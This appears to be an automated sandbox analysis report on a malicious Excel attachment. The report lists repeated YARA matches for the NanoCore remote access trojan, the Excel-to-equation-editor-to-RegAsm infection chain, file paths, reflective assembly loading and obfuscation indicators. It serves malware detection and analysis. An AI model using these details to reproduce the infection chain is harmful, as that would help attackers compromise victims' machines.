          Source: 5.2.RegAsm.exe.de4629.13.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.de0000.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.de0000.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.c10000.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.c10000.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.cb0000.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.cb0000.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.3b73634.26.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.3b73634.26.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 4.2.vbc.exe.3436de0.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 4.2.vbc.exe.3436de0.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 4.2.vbc.exe.3436de0.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 5.2.RegAsm.exe.de0000.14.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.de0000.14.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.5c0000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.5c0000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.0.RegAsm.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.0.RegAsm.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.0.RegAsm.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 5.2.RegAsm.exe.c00000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.c00000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.6c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.6c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 5.2.RegAsm.exe.660000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.660000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.a50000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.a50000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.e10000.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.e10000.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.e14c9f.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.e14c9f.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.2a5109c.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.2a5109c.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.2a5109c.23.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 4.2.vbc.exe.3436de0.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 4.2.vbc.exe.3436de0.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 4.2.vbc.exe.340edc0.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 4.2.vbc.exe.340edc0.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 5.2.RegAsm.exe.2a3fd90.24.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.2a3fd90.24.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.2a3fd90.24.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 5.2.RegAsm.exe.3b73634.26.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.3b73634.26.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 5.2.RegAsm.exe.3b67402.28.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.3b67402.28.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 5.2.RegAsm.exe.2a44ddc.25.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.2a44ddc.25.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.2a44ddc.25.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 5.2.RegAsm.exe.3b625d6.27.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.3b625d6.27.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: new[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: win33.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: 5.2.RegAsm.exe.400000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 5.2.RegAsm.exe.400000.2.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
          Source: 5.2.RegAsm.exe.400000.2.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
          Source: 5.0.RegAsm.exe.400000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 5.0.RegAsm.exe.400000.4.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
          Source: 5.0.RegAsm.exe.400000.4.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
          Source: 5.0.RegAsm.exe.400000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 5.0.RegAsm.exe.400000.2.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
          Source: 5.0.RegAsm.exe.400000.2.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
          Source: 5.2.RegAsm.exe.400000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
          Source: 5.2.RegAsm.exe.400000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 5.0.RegAsm.exe.400000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
          Source: 5.0.RegAsm.exe.400000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 5.0.RegAsm.exe.400000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
          Source: 5.0.RegAsm.exe.400000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@6/20@41/2
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Ref 0180066743.xlsxJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{4614bd42-26c0-4da0-8e09-16890d37c1d7}
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVREA4E.tmpJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Ref 0180066743.xlsxReversingLabs: Detection: 21%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
          Source: Ref 0180066743.xlsxStatic file information: File size 1250304 > 1048576
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: j,C:\Windows\System.pdbpdbtem.pdb source: RegAsm.exe, 00000005.00000002.2367359268.000000000577C000.00000004.00000001.sdmp
          Source: Binary string: *:\Windows\System.pdbpdbtem.pdb source: RegAsm.exe, 00000005.00000002.2367318598.0000000005404000.00000004.00000001.sdmp
          Source: Binary string: inC:\Windows\System.pdb *{ source: RegAsm.exe, 00000005.00000002.2367359268.000000000577C000.00000004.00000001.sdmp
          Source: Binary string: RegAsm.pdb source: RegAsm.exe, RegAsm.exe.4.dr
          Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegAsm.exe, 00000005.00000002.2363768738.0000000000A40000.00000004.00000001.sdmp
          Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: RegAsm.exe, 00000005.00000002.2363890046.0000000000C00000.00000004.00000001.sdmp
          Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: RegAsm.exe, 00000005.00000002.2363611827.0000000000660000.00000004.00000001.sdmp
          Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegAsm.exe, 00000005.00000002.2363776217.0000000000A50000.00000004.00000001.sdmp
          Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: RegAsm.exe, 00000005.00000002.2363636659.00000000006C0000.00000004.00000001.sdmp
          Source: Ref 0180066743.xlsxInitial sample: OLE indicators vbamacros = False
          Source: Ref 0180066743.xlsxInitial sample: OLE indicators encrypted = True

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: new[1].exe.2.dr, eUnEQpPUQit5jSTQYO/C7A56p5KOPoLNTOEQM.cs.Net Code: Hn9GJ4JDT System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: win33.exe.4.dr, eUnEQpPUQit5jSTQYO/C7A56p5KOPoLNTOEQM.cs.Net Code: Hn9GJ4JDT System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.2.vbc.exe.df0000.3.unpack, eUnEQpPUQit5jSTQYO/C7A56p5KOPoLNTOEQM.cs.Net Code: Hn9GJ4JDT System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.vbc.exe.df0000.0.unpack, eUnEQpPUQit5jSTQYO/C7A56p5KOPoLNTOEQM.cs.Net Code: Hn9GJ4JDT System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.2.RegAsm.exe.400000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.2.RegAsm.exe.400000.2.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.RegAsm.exe.400000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
